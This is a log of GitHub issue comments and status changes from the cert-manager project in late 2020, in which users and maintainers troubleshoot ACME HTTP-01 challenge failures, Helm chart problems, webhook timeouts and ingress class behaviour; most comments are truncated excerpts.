
[2020-09-24 07:42] meyskens commented on #3293
@kaypeter87 did you also look at the Challenge resources?

[2020-09-24 07:43] meyskens commented on #2482
I think we can close this for now? Feel free to /reopen if needed!

/close

[2020-09-24 07:43] #2482 closed

[2020-09-24 07:45] meyskens commented on #3307
Can you access `my-cluster-kafka-bootstrap-kafka.apps.ci-ln-3k3tm8k-f76d1.origin-ci-int-gce.dev.openshift.com/.well-known/acme-challenge/TekdQrts_M_Jb7ENn73rtFJErqXPZctbFVo6VDAS9g8` ?

[2020-09-24 08:38] gudipudipradeep commented on #3238
@meyskens  I was also getting same issue. Providing the result.
![Uploading Capture1.PNG…]()

[2020-09-24 08:50] fmasion commented on #3298
Hello Maartje,

This sounds pretty clever.
I have to add a cleaning step if the host is no more needed but it makes the certificate lifecycle more clear :
create / update / delete instead of (re)create / delete

I try that and give you feedback
Thanx
Fred

[2020-09-24 08:53] meyskens commented on #3298
@fmasion a PR to the documentation would be welcome about this! Can't imagine you're the only person in the world hitting this so it will help others :wink:

[2020-09-24 09:36] vainkop commented on #3310
Good catch @meyskens ! :) Removal of `acme.cert-manager.io/http01-edit-in-place: 'true'` makes it work, of course. Thanks!

[2020-09-24 09:36] #3310 closed

[2020-09-24 09:36] hubstairs-admin commented on #3282
Thank you @meyskens My issue is solved. My certificate has been issued.
I don't know why but I noticed this issue happen when the rate limit for issuing my certificate is reach (I check DnsName certificate on https://letsdebug.net).

[2020-09-24 09:36] #3282 closed

[2020-09-24 13:55] kaypeter87 commented on #3293
Yes, it seems none of the challenges for that order has been created.

[2020-09-24 13:59] michelefa1988 commented on #2538
Guys, whats the conclusion of this? Is it a bug which needs to be fixed or are threr any workarounds?

My goal is simple. I have 2x ingresses, NGINX and INTERNAL. When I am using internal ingress, I want to be able to resolve the ACME challage using the NGINX ingress controller.

Please advise,

[2020-09-24 14:04] sagikazarmark commented on #2538
@michelefa1988 you can manually set the ingress class to be used by Cert Manager:

[code]

You are actually not affected by this (in my opinion) bug, because you actually want to use a different ingress class anyway. This issue is about cert manager not falling back to the ingress class of the ingress when the issuer does not define an ingress class itself (or there is no annotation).

[2020-09-24 15:03] meyskens commented on #3245
Fixed by https://github.com/kubernetes-sigs/krew-index/pull/800

[2020-09-24 15:03] #3245 closed

[2020-09-24 15:21] Morallying opened #3315 "Incorrect syntax in helm chart template conditionals"
https://github.com/jetstack/cert-manager/blob/4a13dd72f306e45c78e64fde7fbb079dca077a70/deploy/charts/cert-manager/templates/webhook-validating-webhook.yaml#L5

and

https://github.com/jetstack/cert-manager/blob/4a13dd72f306e45c78e64fde7fbb079dca077a70/deploy/charts/cert-manager/templates/webhook-mutating-webhook.yaml#L5

Should the two lines above not be : `{{- $isV1AdmissionRegistration := true -

[2020-09-24 15:40] ttinkr commented on #2930
Is there a mirror available yet?
We are trying to pull images from quay.io using kaniko and it seems quay.io only supports docker api v1, but kaniko only supports v2.

[2020-09-24 15:50] meyskens commented on #3292
/assign

[2020-09-24 15:59] meyskens commented on #3315
It should be `=` as it is overwriting https://github.com/jetstack/cert-manager/blob/master/deploy/charts/cert-manager/templates/webhook-mutating-webhook.yaml#L1

Not entirely sure why you are getting that error

[2020-09-24 16:05] Morallying commented on #3315
Right, but shouldn't that be `:=`?

[2020-09-24 16:34] alexppg opened #3317 "Hability to disable webhook in the helm chart"
**Is your feature request related to a problem? Please describe.**
In the past you could disable the webhook deployment with `webhook.enabled`, but it doesn't seem to be an option now.

I understand that it's not good to do so, but in some cases may be necessary, so it's always interesting to be able to do so.

**Describe the solution you'd like**
Restore that functionality.

/kind feature

[2020-09-24 17:11] gudipudipradeep opened #3318 "Waiting for http-01 challenge propagation: failed to perform self check GET request"
I am facing following issue. Please help us.
I am using HAproxy as ingress controller. Using Azure aks cloud.
`
 Reason:      Waiting for http-01 challenge propagation: failed to perform self check GET request 'http://jenkins-tools.qae.ppr-ci.xxxx.com/.well-known/acme-challenge/DQL32cbEdQI9fU-T6aV0T0kfqU0r-9QUKpdwn2JMDkg': Get "https://jenkins-tools.qae.ppr-ci.xxxx.com/.well-known/acme-challenge/D

[2020-09-24 19:09] ppatierno commented on #3307
I created a new OpenShift cluster so the address will be different but I tried to do what you asked.
So following the Ingress:

[code]

If I use `curl` from my laptop I get a 503 error with HTML ...

[code]

[2020-09-24 19:19] ppatierno commented on #3307
If I try to `curl` from inside the OpenShift cluster directly on the service backed by the Ingress on port 8089, I got 200 OK and the log of the pod is:

[code]

So I guess I am hitting the health check path (root).
It means there is a problem in the Ingress configuration that anyway is created by cert-manager not by me.
Any more thoughts?

[2020-09-24 19:26] ppatierno commented on #3307
@meyskens I actually found something interesting.
What I am trying to do is to generate a certificate for the DNS name `my-cluster-kafka-bootstrap-myproject.apps.ppatierno.rhmw-integrations.net` which is actually a Route in the namespace myproject.
I just noticed that when I create the `Certificate` in the cert-manager namespace, the cert-manager creates another Route named like cm-acme-http-solve

[2020-09-25 02:35] katlimruiz commented on #2497
Had I seen this issue one day ago, I would've saved a full day of work.

I have been trying to make it work and it seemed that the whole documentation is actually working out with the namecheap cert, howver, it never reaches the goal.

The solution is to create a secret using the mydomain.crt, mydomain.key (both converted to base64 with `cat mydomain.crt|base64 -w0>f.txt`).

And then simply on my

[2020-09-25 04:58] Kampe commented on #2362
This is still an issue with 1.0.1 and Kubernetes 1.16

[2020-09-25 05:30] Kampe opened #3319 "Leader election fails after install via manual manifest apply"
Hi!  Having some trouble installing cert-manager.  We utilize kustomize + argocd to install cert manager, and to do so there's a few hoops to jump though to get things to roll out properly.  It seems, however when things do spin up cert-manager is very angry about configmaps in kube-system namespace.

We use kustomize to get argocd to install cert-manager correct, you have to use sync-wave patches

[2020-09-25 05:56] Kampe commented on #3319
nevermind, I was overwriting the `kube-system` namespace to be cert-manager with the `kustomization.yaml`

[2020-09-25 05:56] #3319 closed

[2020-09-25 07:19] sch0718 commented on #3312
Thanks for guiding me to trouble shooting.
I found out that the GKE private cluster was the cause.
I'm trying to configure a firewall, but I don't know which ports to open as targets.
I'm trying to configure a firewall, but I don't know where to open which port on which protocol.
I'm almost at my goal now. Please help me a little more.

[2020-09-25 08:12] meyskens commented on #3317
If we add this to the Helm chart it means we would have to support it and handle cases where it goes wrong. The webhook became an essential part (especially the conversion one) of the cert-manager controller.
If you want to disable this I invite you to make a private copy of the chart, however we will not be able to provide you any guarantees or help with this disabled.

I'd like to know more abou

[2020-09-25 08:12] #3317 closed

[2020-09-25 08:12] stopsopa commented on #656
Path for this definitely needed, and it seems that there are people/organizations willing and knowing how to help:
https://github.com/jetstack/cert-manager/issues/656#issuecomment-689148240
I hope it will be addressed soon because @bergkvist solution is brilliant but also pretty nasty but at the moment it looks like that's all what we have.

[2020-09-25 08:16] meyskens commented on #2930
@ttinkr not yet. Is weird that quay.io only supports v1 as we definitely use v2 specific features...

The idea here is to setup a tool that will mirror every x minutes/hours all images between quay.io and another registry. Which one is yet a question as Docker Hub now implements a lot of rate limits which could harm users and we did the math on GCR which will cost us (Jetstack) a lot of money (1.3

[2020-09-25 08:51] michelefa1988 commented on #2538
@sagikazarmark , Do you know if this is a known issue I have bumped into or are there any work arounds? I have been adding the below, to my internal application ingress but the challenge is never created on internal services (works fine on public nginxingress)
[code]

[2020-09-25 08:52] bergkvist commented on #656
@stopsopa So there is actually another alternative, which makes the self-checks work even with PROXY protocol enabled.

[code]

Notice that you have to explicitly write your domain ("example.com") in order for the kubernetes iptables issue to be worked around. Not sure how this would work if you have multiple domains pointing to the same loadbalancer.

Subdomains work fine though (like www.example

[2020-09-25 08:54] meyskens commented on #3312
The Helm chart might help: https://github.com/jetstack/cert-manager/blob/master/deploy/charts/cert-manager/templates/service.yaml

[2020-09-25 08:58] meyskens commented on #3307
cert-manager will create Kubernetes Ingresses which seem to get converted to OpenShift Routes, I think something goes wrong there. I have no experience with OpenShift Routes might be worth asking in an OpenShift community.

[2020-09-25 08:59] sagikazarmark commented on #2538
I think that's a different issue. This one is about the right fallback which is documented, but does not actually work.

[2020-09-25 09:01] meyskens commented on #3315
Which version of Helm are you using? I find it weird that we do not see this error.

[2020-09-25 09:07] michelefa1988 commented on #2538
@SaaldjorMike  ,If you think it doesn't work then ill lay it to rest for now 👍

Thank you!!

[2020-09-25 09:10] SaaldjorMike commented on #2538
@michelefa1988 I think you highlighted the wrong person 😄

[2020-09-25 09:31] stopsopa commented on #656
Thanks mate I've tried to fix that for two evenings, pulling my hair off, and actually I've been doing this too but with other configuration.

[2020-09-25 09:53] blacs30 commented on #2930
I don't know if this tool would be a help for this
https://github.com/plexsystems/sinker

[2020-09-25 13:10] 4ss3g4f commented on #3261
@meyskens ,

[code]

[2020-09-25 13:13] Morallying commented on #3315
`Client: &version.Version{SemVer:"v2.9.1", GitCommit:"20adb27c7c5868466912eebdf6664e7390ebe710", GitTreeState:"clean"}`

`Server: &version.Version{SemVer:"v2.9.0", GitCommit:"f6025bb9ee7daf9fee0026541c90a6f557a3e0bc", GitTreeState:"clean"}`

[2020-09-25 14:06] katlimruiz commented on #3311
Well, it is fixed because I found out several things I was doing wrong.
First Lets Encrypt does not accept wildcard domains.
Second, I then tried to go thru a bought certificate path, and then found out that cert-manager does not work with those at all.
So I installed my cert in a secret, linked directly to the ingress and it worked.
    On Thursday, September 24, 2020, 2:17:30 AM GMT-5, Maartje E

[2020-09-25 14:20] AlexsJones commented on #3133
[code]

version
[code]

[code]

Noticing a very similar if not the same issue on a fresh install into Kind from v1.0.1

[2020-09-25 14:31] #3292 closed

[2020-09-25 14:33] iosifnicolae2 commented on #2918
I've solved this problem by using the latest version of `jetstack/cert-manager`:
[code]

[2020-09-25 15:34] #3267 closed

[2020-09-25 16:45] 4ss3g4f commented on #3261
@meyskens ,

We think that root cause due to, A record does not exist,

[code]

example subdomain with A record available,

[code]

[2020-09-26 07:47] alexppg commented on #3317
I see, thanks. I just found that the way to go is using the host network in my case, thanks!

[2020-09-26 07:52] alexppg opened #3324 "Chart: When using hostNetwork, the port is not added to the psp"
**Describe the bug**:
When activating the `webhook.hostNetwork` while having psp enabled, the webhook deploy won't start because its psp doesn't have the host ports it needs.

**Expected behaviour**:
It should deploy.

**Steps to reproduce the bug**:
Just deploy it with the psp admission controller activated, and `webhook.hostNetwork` true.

**Anything else we need to know?**:
I guess it could be

[2020-09-26 08:15] alexppg commented on #3317
I'm actually not sure about why the validation doesn't work. I use k3s with the ipsec backend on flannel, and I've activated the hostNetwork on webhook. I have the master on a remote network and one worker in my local lan. The worker is the one that has all the cert-manager related stuff.

I still can't create issuers or clusterissuers because of the timeout on the validating api:
[code]
What I do

[2020-09-26 14:40] TrurlMcByte commented on #3293
Looks like sometimes (~0.5% of all certificates) cert-manager create unnecessary order on already renewed certificate.
And after it always come error ```cert-manager/controller/certificaterequests-issuer-acme "msg"="re-queuing item  due to error processing" "error"="Operation cannot be fulfilled on certificaterequests.cert-manager.io \"mydomain.com-fndl9\": the object has been modified; please app

[2020-09-26 16:24] ruckc commented on #3237
Yes, ran into this also.  Ended up moving cert-manager to a nodegroup for the time being.

[2020-09-26 22:21] Jacob1r opened #3325 "Waiting for HTTP-01 challenge propagation: wrong status code '404', expected '200'"
I have https with cert-manager working on my other site, however I am trying to get it working on a new site/domain but I am getting this error. Is it something to do with https redirection or something?

**Describe the bug**:
The challenge is not been accepted - 404 error

**Expected behaviour**:
For the certificate to be accepted via http01

**Steps to find error:**:
**kubectl describe certifica

[2020-09-27 07:54] Schachte commented on #2487
@munnerz I'm still running into this same failure.

[code]

[2020-09-27 08:13] bodom0015 commented on #3293
I appear to be seeing the same behavior as @kaypeter87 above, but may have a workaround to offer.

Initially I had only configured the `spec.tls.hosts` for the wildcard domain, but not for the root domain above the wildcard:
[code]

As a test, I added the root domain alongside the wildcard in the TLS section and that appeared to fix things :+1:
[code]

In my case this seemed to resolve things, and

[2020-09-27 09:46] ivan-sirosh commented on #2842
Can confirm, pointing the coredns config to lead to a corporate dns server instead of 8.8.8.8 helps a lot. Suppose problem was in a network routing where cert-manager/challenger can not reach itself from a local network.

[2020-09-27 13:07] kaypeter87 commented on #3293
It appears my certificate having the issue has successfully been issued. I can safely say that it took 48 hours to issue and it appears to be a rate limiting problem. What worries me is that there were no indication of rate limiting in the debug logs and other new certificates were being issued during this problem. I cannot say, as there are many variables, if let's encrypt or cert-manager was fai

[2020-09-28 00:46] nabsul commented on #3238
Hi, I'm having the same problem (with nginx ingress). I tried curling the validation URL from a pod in the cluster and got the following response:

[code]

Whereas doing the same from outside the cluster returns the secret as expected.

Does this mean there's something strange going on with DNS in Kubernetes?

[2020-09-28 00:54] nabsul commented on #3238
Interestingly, I can access external domains from the pod, but I can't seem to access any of the domains that are hosted inside this cluster. For example:

[code]

[2020-09-28 01:59] seunroava commented on #3274
I have been experiencing same issue for days now. I have existing cert-manager v1.0.1 installed on GKE. Initially, I use the certificate to power Spinnaker Installation and it worked fine. Still working too. But when I try to install another application (this time pulsar), certificates all returned false and the above error from @kvaps showed.

Interestingly, I created a brand new cluster, install

[2020-09-28 06:46] ttinkr commented on #2930
@meyskens Alright, I will open a separate issue to maybe get help with that. Thanks!

[2020-09-28 10:48] tvvignesh opened #3327 "Timeout when deploying in GKE private cluster even after adding firewall rules"
**Describe the bug**:
Pods not getting deployed when in the GKE private cluster (deployed via Helm Chart) and I get timeout errors. The pods are not showing up and there are no logs to look at:

<img width="236" alt="1" src="https://user-images.githubusercontent.com/1165845/94422313-8aceb900-01a4-11eb-8fb7-a83c9a4a0758.png">

<img width="474" alt="2" src="https://user-images.githubusercontent.com/

[2020-09-28 12:44] meyskens commented on #2175
/assign

[2020-09-28 14:06] sharmaansh21 commented on #3250
/assign

[2020-09-28 14:07] sharmaansh21 commented on #3286
/assign

[2020-09-28 14:10] floriansiepe opened #3329 "ErrInitIssuer x509: certificate has expired or is not yet valid"
**Describe the bug**:
Cert-manager is unable to init Lets Encrypt cluster issuer.
Result of `kubectl describe clusterissuers letsencrypt-staging`:
[code]

**Expected behaviour**:
Should init the issuer

**Steps to reproduce the bug**:
1. Install k3s single node cluster as shown [here](https://k3s.io/)
2. `kubectl create ns cert-manager`
3. `kubectl apply --validate=false -f https://github.com/jets

[2020-09-28 16:19] tvvignesh commented on #3327
Hi. After a lot of digging, just figured it out. Since I use Linkerd in GKE private cluster, I had to setup the firewall rules for that as per this doc: https://linkerd.io/2/reference/cluster-configuration/

Cert Manager works after that. Closing this.

[2020-09-28 16:19] #3327 closed

[2020-09-28 21:16] Jacob1r commented on #3325
I figured it out. The issue seems to be that IngressRoute (which is used in traefik) does not work with cert mananger. I just deployed this file, then the http check was confirmed, then I could delete it again.

Can cert manager support IngressRoute?

**kubectl apply -f example-ingress.yml**

[code]

[2020-09-29 01:09] liulangwa commented on #2752
这个问题可能是cni导致的，我修改了calico的mtu后这个问题解决了(This problem may be caused by cni. After I modified the mtu of calico, the problem was solved.)

[code]

[2020-09-29 01:14] liulangwa commented on #2602
这个问题可能是cni导致的，我修改了calico的mtu后这个问题解决了(This problem may be caused by cni. After I modified the mtu of calico, the problem was solved.)

{
  "name": "k8s-pod-network",
  "cniVersion": "0.3.1",
  "plugins": [
    {
      "type": "calico",
      "log_level": "info",
      "log_file_path": "/var/log/calico/cni/cni.log",
      "datastore_type": "kubernetes",
      "nodename": "k3s-operator-1",
      "mtu

[2020-09-29 02:42] liulangwa commented on #2811
这个问题可能是cni导致的，我修改了calico的mtu后这个问题解决了(This problem may be caused by cni. After I modified the mtu of calico, the problem was solved.)

 "mtu": 1440-> "mtu": 1420,

[code]

[2020-09-29 12:28] #3286 closed

[2020-09-29 12:40] GrandChaman commented on #843
Would it be possible to add support for `DER` encoded certificates and keys, to support `postgres` `jbdc` for mutual TLS ?

[2020-09-29 13:36] willikay11 opened #3331 "Challenge Fails: Waiting for HTTP-01 challenge propagation: did not get expected response when querying endpoint, expected 'XXXX' but got: 'YYYY'"
I am facing an issue in regards using cert-manager along with Kong Ingress Controller to automate TLS certificate provisioning.
When I am provisioning I get the following error: **Waiting for HTTP-01 challenge propagation: did not get expected response when querying endpoint, expected 'xxxx' but got: Hostname: 'yyyy'**

Followed this [tutorial](https://github.com/Kong/kubernetes-ingress-controller

[2020-09-29 14:49] royolsen opened #3332 "Challenge stuck in pending - Waiting for HTTP-01 challenge propagation: wrong status code '404', expected '200'"
**Describe the bug**:

My deployment is based on https://opensource.com/article/20/3/ssl-letsencrypt-k3s and has been working well until recently.

I reinstalled my cluster using the same ansible automation as always, deployed a more recent cert-manager of 1.0.2 and deployed the same staging manifests as before. Rather surprisingly, challenges will now remain stuck waiting for challenge propagatio

[2020-09-29 20:25] drewwells commented on #1363
Now there is a helm chart install, how does this get applied. It's easily possible to ignore a namespace in the mutatingwebhook so this label is not required. Istio does this https://github.com/istio/istio/blob/master/manifests/charts/istio-control/istio-discovery/templates/mutatingwebhook.yaml#L33-L37

[2020-09-29 21:39] royolsen commented on #3332
Re-imaging the cluster nodes with a fresh OS install and re-deploying everything immediately solved the issue. I still don't know what the problem was, but something must have been broken in the kubernetes network services.

[2020-09-29 21:39] #3332 closed

[2020-09-30 09:16] #2175 closed

[2020-09-30 13:03] ovidiubuligan commented on #3283
Generating the certificate works but It generates it as a secret with that extra suffix  .I also get errors while nginix tries to load the certificate since the rule is configured washout the suffix:
[code]

[2020-09-30 15:33] mous2890 opened #3334 "cert-manager upgrade failing due to existing resource conflict"
**Describe the bug**:
When upgrading from v0.16.1 to v1.0.2, installing the new version of cert-manager is erroring due to a conflict with an existing resource:

Install CRDs:
[code]

Helm Install cert-manager:
[code]

**Expected behaviour**:
It is expected that the upgrade of cert-manager will handle this gracefully and successfully deploy.

**Steps to reproduce the bug**:
install cert-manager CR

[2020-09-30 16:28] james-w commented on #3140
Talking with @meyskens we think the best approach is to use the pkcs12 cert support to do this. We can take a cert as
the input, and then use that to get the tokens.

We still need to account for the tokens expiring, and triggering token refresh, either with the refresh token or with the
pkcs12 cert.

[2020-09-30 18:34] Roydon opened #3335 "ClusterIssuer LetsEncrypt Certificate not ready"
Followed steps mentioned at https://cert-manager.io/docs/installation/kubernetes/
`$ kubectl create namespace cert-manager`

`$ helm repo add jetstack https://charts.jetstack.io`

`$ helm repo update`

[code]

[code]

**ClusterIssuer**

[code]
**Certificate**

[code]

[code]

**certificate test-cert**

[code]

[code]

**CertificateRequest**

[code]

Certificate is in pending state. What I am missi

[2020-09-30 20:01] ycao56 opened #3336 "install cert-manager 2nd time hangs"
**Describe the bug**:
Follow documentation to install cert-manager with command
`oc apply --validate=false -f https://github.com/jetstack/cert-manager/releases/download/v1.0.1/cert-manager.yaml`
Everything worked fine
[code]
Install it again without removing it
The command hangs at
[code]
**Expected behaviour**:
The install should not hang even though cert manager has been already installed

**Ste

[2020-09-30 23:51] whereisaaron commented on #2538
@munnerz I believe this behavior is a regression, We have used `cert-manager` with custom classes forever and the ingress class for challenges use to behave as the documentation said (as @sagikazarmark highlighted). If you set in `ingress.class` on the Ingress then the challenge Ingress would use the same class. Then, after upgrading a few versions to 0.16, this suddenly stopped working and challe

[2020-09-30 23:54] whereisaaron commented on #2314
I can confirm this works correctly in 0.8.x, so the bug/regression occurred somewhere between 0.8 and 0.11.

Discussion on https://github.com/jetstack/cert-manager/issues/2538#issuecomment-701705394

[2020-10-01 00:08] whereisaaron commented on #3182
This is a duplicate of #2538 and #2314. See comments: https://github.com/jetstack/cert-manager/issues/2538#issuecomment-701705394

Looking at the other reports this regression occurred somewhere between 0.8.x and 0.11.x. Before that this worked fine and challenge Ingress's still correctly defaulted to the same class as the Ingress `ingress.class`. The documentation also said that was how it should

[2020-10-01 00:37] rickymulder opened #3337 "Support solvers for CA Issuers"
I am running a disconnected environment, and do not have access to any of the provided ACME issuers that live outside the network.  Additionally, I do not wish to run my own internal Vault server or other related tool for the management overhead it causes.

My current security standards allow me to run a SubCA in our environment (Issued through internal Windows PKI) per Kube Cluster, but restrict

[2020-10-01 08:06] ankitsoni17-png opened #3338 "Internal error occurred: failed calling webhook "webhook.cert-manager.io": Post https://rancher-cert-cert-manager-webhook.cert-manager.svc:443/mutate?timeout=30s: x509: certificate signed by unknown authority (possibly because of "x509: ECDSA verification failure" while trying to verify candidate authority certificate "cert-manager-webhook-ca")"
Describe the bug:

I am using cert-manager to generate the certificate for Rancher. I am using helm chart to deploy both. (cert-manager version 0.16.1
 and Rancher version 2.4.8). Cert-manager is deployed successfully but while deploying Rancher facing issues in generating certificate.

`Internal error occurred: failed calling webhook "webhook.cert-manager.io": Post https://rancher-cert-cert-manag

[2020-10-01 08:56] jawabuu commented on #3025
Hey @hzhou97  no feedback yet from Letsencrypt.
The current 'workaround' is that root domain must be created before using letsencrypt.
I propose to keep the issue open until someone else can replicate it.

[2020-10-01 12:21] bergerx commented on #3274
Our issue with the spec in https://github.com/jetstack/cert-manager/issues/3274#issuecomment-692107616 seems like its still not addressed by #3279, we tried 1.0.2 which has the #3279 and certs were still broken.

Instead of keep debugging the issue we applied this change to our cert definitions as a workaround:
[code]

[2020-10-01 12:54] gitnik commented on #3021
Running into the exact same issue. Disabling the validation did not fix this

[2020-10-01 13:07] gitnik commented on #3021
OK so using a new API Token instead of the global one works, as we had set apiTokenSecretRef

[2020-10-01 13:56] proligde opened #3339 "Certificate stuck in issuing process - no challenge cretead and log only says "the object has been modified""
After using cert-manager on several clusters running k3s without problem I've now been running into an issue I couldn't solve and all existing bug reports that were similar to my problem on first sight were leading somewhere else in the end:

What I've done:

1. Newly installed Cluster, 2. added namespace 3. cert-manager and then 4.:

[code]

5. Added Cluster-Issuer (I tried both: DNS challenge vi

[2020-10-01 15:13] crandles commented on #2166
When i set up my intermediate CA in vault, I added the root CA to the intermediate CA bundle via the [/pki/config/ca](https://www.vaultproject.io/api-docs/secret/pki#submit-ca-information) API so that vault should return both when certificates are issued.

When i issue a secret manually, multiple certificates are included in the `ca_chain` section:
[code]

I believe this code in question is respon

[2020-10-01 15:14] crandles commented on #2166
/reopen

[2020-10-01 16:34] Serrvosky commented on #1607
I have the same issue with NGINX

[2020-10-01 16:44] Serrvosky opened #3341 "Propagation check failed"
**Describe the bug**:
I'm getting this error when cert-manager is trying to generate a new certificate. I already deleted all the resources (https-solver od, service, ingress, etc) to restart all the process as clean as possible but I still stuck on this error. It doesn't happen all the time, and with all the certificates that I want luckily, but when it stucks looks like forever.

**Expected beha

[2020-10-01 18:09] ksummersill2 commented on #1978
Is there a resolution to this? I mean come'on man; this does not remove the challenge pods?

[2020-10-02 00:34] luishdez commented on #3021
I did fixed with global token using

[code]

[2020-10-02 00:34] evgkrsk opened #3342 "Add PrometheusRule"
**Is your feature request related to a problem? Please describe.**
At cert-manager 1.0, there is ServiceMonitor to scrape certs metrics, but there is no alert(s) on certs renew failures to cluster operator.

**Describe the solution you'd like**
PrometheusRule object with alerting rules about expiring certs. Plus, ability to extend/override default rules via helm values.

/kind feature

[2020-10-02 09:27] meyskens commented on #1978
@ksummersill2 you can remove those pods using `kubectl delete pod`.
This issue is also about the old API which is now not available any longer. If you are having issues with the latest version I invite you to create a new ticket for it.

[2020-10-02 09:30] meyskens commented on #3342
Would be a nice addition!

/good-first-issue
/priority backlog
/area deploy

[2020-10-02 10:11] ppatierno commented on #3307
@meyskens I was thinking more about this issue and to be honest, I am confused about how the ACME protocol is going to work in this case. I don't see a problem in how the OpenShift route behaves. You know ACME protocol better than me so you could enlighten me.
I have a route `my-cluster-kafka-bootstrap-myproject.apps.ppatierno.rhmw-integrations.net` in a namespace and I want to get a certificate f

[2020-10-02 10:14] stieler-it commented on #3334
I also experienced this on a fresh install of v1.0.2

[2020-10-02 10:35] stieler-it commented on #3334
I noticed that after

    kubectl apply --validate=false -f https://github.com/jetstack/cert-manager/releases/download/v1.0.2/cert-manager.yaml

some resources are created that the Helm chart also wants to create. By setting `global.rbac.create: false` I could workaround the error that has been reported here, but then I run into the next error:

    Error: rendered manifests contain a resource tha

[2020-10-02 11:56] ppatierno commented on #3307
I got the explanation for this and it's actually how OpenShift routes work when the TLS termination is "passthrough" listening on port 443 only. It's not able to multiplex to a different path as when it's "edge" termination listening on both 80 and 443.

[2020-10-02 12:01] proligde commented on #3339
Ok I found out more: I might have ran into #3267 - I changed the tld of the hostname to another one I also own and the problem still existed so I ruled that bug out prematurely. But I just found out that it works instantly when using a COMPLETELY different hostname. I'll close the ticket, assuming it is also related to #3267 as it's already addressed in #3321

[2020-10-02 12:01] #3339 closed

[2020-10-02 13:18] Serrvosky commented on #3341
An update for this issue. I think I found the problem however I don't know how to resolve it. If I perform a GET using curl to `http://mirrors.domain.com/.well-known/acme-challenge/C1Gid2CFSA-wlCd2ipUM6D3_UiYoQejYhCVja5AFfNo` I have an answer, but when I perform the same command from a pod inside my cluster I get this response `curl: (52) Empty reply from server`, that's why I'm getting an EOF err

[2020-10-02 13:34] meyskens commented on #3274
@bergerx was able to reproduce this

/reopen

[2020-10-02 14:56] meyskens commented on #3341
What is your ingress setup? Are you by any chance having a firewall or NAT router somewhere?

[2020-10-02 14:56] meyskens commented on #3341
/triage support
/remove-kind bug

[2020-10-02 15:29] meyskens commented on #3336
This is a duplicate of #3121
You might want to update your tooling :wink:

/close

[2020-10-02 15:30] #3336 closed

[2020-10-02 15:39] meyskens commented on #3307
It has to verify you own that hostname, thus it needs to host something on that hostname.

cert-manager creates a new ingress so it will not modify your resources to add an extra path (you can imagine it causes conflicts).
If you don't want 2 ingresses valid for 1 host (which is valid in the Kubernetes spec) you can use `acme.cert-manager.io/http01-edit-in-place: "true"` https://cert-manager.io/do

[2020-10-02 15:56] meyskens commented on #3334
This seems to be some issue in Helm, I am guessing with upgrading versions of resources but I am not too sure. Could you file an issue with Helm for this?

[2020-10-02 16:03] meyskens commented on #2166
/reopen
/remove-lifecycle rotten

here you go!

[2020-10-02 16:05] meyskens commented on #3025
@jawabuu do you have a link to the let's encrypt community we can link to where this was asked?

[2020-10-02 16:07] meyskens commented on #3338
Is this a fresh install of cert-manager?

/triage support

[2020-10-02 16:11] meyskens commented on #3337
the selector will not limit the ability to request certs. You might want a policy for it which we're looking into supporting later (see other issues).

As you plan to use Vault you can also use Vault to limit the domains.

Hope this helps.

/close

[2020-10-02 16:11] #3337 closed

[2020-10-02 16:14] meyskens commented on #3182
Can you move this to https://github.com/jetstack/cert-manager/issues/2538? thanks!

/close

[2020-10-02 16:14] #3182 closed

[2020-10-02 16:21] meyskens commented on #3140
Advantage on pkcs12 is that we can store the tokens in memory so we do not have to update the secret

[2020-10-02 16:24] meyskens commented on #2930
@blacs30 that looks good! we'll look into it!

[2020-10-02 16:31] meyskens commented on #3335
Have you looked at https://cert-manager.io/docs/faq/acme/

/remove-kind bug
/triage support

[2020-10-02 17:30] jnu commented on #3062
I'm running into this issue as well with helm 3.3.4. Setting the `installCRDs` flag unfortunately still requires a two-step install because helm will not know the CRDs exist when it tries to use them in your chart. Sounds like this is not a race exactly, but a [caching problem](https://github.com/helm/helm/issues/2994#issuecomment-532789579). Either way, it doesn't work well, so it makes me wonder

[2020-10-02 17:47] jnu commented on #3246
@proligde I'm still running into this issue on a fresh install with helm 3.3.4 using cert-manager as a dependency:

e.g.
[code]

From what I've read, the problem sounds like the [discovery caching logic](https://github.com/helm/helm/issues/2994#issuecomment-532789579) in helm3. So you can't both install CRDs and use them in a single helm install step, if installing CRDs through an ordinary templat

[2020-10-02 18:42] Roydon commented on #3335
according to https://cert-manager.io/docs/configuration/acme/dns01/#setting-nameservers-for-dns01-self-check
I re-install cert-manager

[code]
DNS-01 challenges failed with t following error
[code]

[2020-10-05 03:00] ankitsoni17-png commented on #3338
Hi @meyskens
Yes it is a fresh installation of cert-manager.

[2020-10-05 11:10] alexzorin commented on #3025
That is the expected behavior of CAA lookups. https://www.rfc-editor.org/rfc/rfc8659.html#name-relevant-resource-record-se:

If you don't publish a CAA record at `whoami.subdomain.example.com`, then it will be followed up with successive CAA queries for `subdomain.example.com`, `example.com` and finally `com`.

If any of those queries hits an error, as `example.com` does in your report, then the e

[2020-10-05 11:22] jawabuu commented on #3025
Hey @alexzorin This is well received.
@meyskens Feel free to close the issue. You could probably add this to your WIKI or gotchas as it may prove very difficult to debug for users unaware of the specifications.

[2020-10-05 11:57] dverbeek84 commented on #2882
Yes i have the same issue @whereismyjetpack, its still trying to doe the account binding.

[2020-10-05 12:23] dverbeek84 commented on #2882
Looks like the register part is also used for verify.
For me here it is going wrong:

log:  setup.go:218] cert-manager/controller/clusterissuers "msg"="failed to verify ACME account" "error"="400 urn:ietf:params:acme:error:malformed: [External Account Binding] The account is not awaiting external account binding" "related_resource_kind"="Secret" "related_resource_name"="sectigo-private-key" "relat

[2020-10-05 12:27] dverbeek84 commented on #2882
/reopen

[2020-10-05 17:10] hfuss commented on #2722
I would like cert-manager to be able to inject a `ca.crt` or `ca-bundle.crt` into a `Secret`/`ConfigMap`.

My use case is OpenShift 4.5 clusters which come with an internal CA-signed wildcard cert for ingresses such as the console UI `console-openshift-console.apps.{{ .clusterDomain }}` where `clusterDomain` is a domain I manage in Route53 and could get certs for through LetsEncrypt. It also comes

[2020-10-06 05:02] apjoseph commented on #3298
@meyskens Can you elaborate on how to enable http challenges with this set up? When I create a certificate manually and then reference the secret in the ingress without annotations as per your example, the Certificate request is left pending presumably because the ingress isn't aware that it is supposed to set up the challenges for the defined secret (which doesn't yet exist).

I'm looking to crea

[2020-10-06 07:18] umegaya commented on #2425
@cmoulliard could you elaborate on detail? I seem to run into same issue. your route (/) covers entire access to kuard.snowdrop.me, did this cause the problem?

[2020-10-06 08:35] Serrvosky commented on #3341
Hi @meyskens.

There are no firewall or NAT.

About my ingress setup, this was my implementation:
[code]

[2020-10-06 08:38] Serrvosky commented on #3238
I'm facing the same problem as  @nabsul

